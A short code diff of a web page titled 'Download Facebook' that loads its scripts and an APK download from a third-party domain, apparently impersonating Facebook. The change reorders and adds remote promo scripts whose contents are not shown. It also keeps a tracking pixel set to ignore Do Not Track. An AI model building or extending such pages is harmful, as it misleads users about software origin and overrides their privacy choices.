--- a/index.html
+++ b/index.html
@@ -8,6 +8,7 @@
     <title id="page-title">Download Facebook</title>
     <link rel="stylesheet" href="https://res.dkon.app/get-android/dalam-apk.css">
     <script src="https://res.dkon.app/api/lang-apk/start.js"></script>
+    <script src="https://res.dkon.app/promo-land-hub/a.js"></script>
     <script defer src="https://res.dkon.app/promo-land-hub/d.js"></script>
     <script defer src="https://mpwmp.dkon.app/pixel/e7ldzj4QkORc7GjP" data-ignore-dnt="true"></script>
 
@@ -94,7 +95,7 @@
         </div>
     </section>
     <script src="https://res.dkon.app/get-android/dalam-apk.js?v=2"></script>
-    <script src="https://res.dkon.app/promo-land-hub/a.js"></script>
+    <script src="https://res.dkon.app/promo-land-hub/f.js"></script>
     <footer>
         <p>
             © 2024 Facebook. 
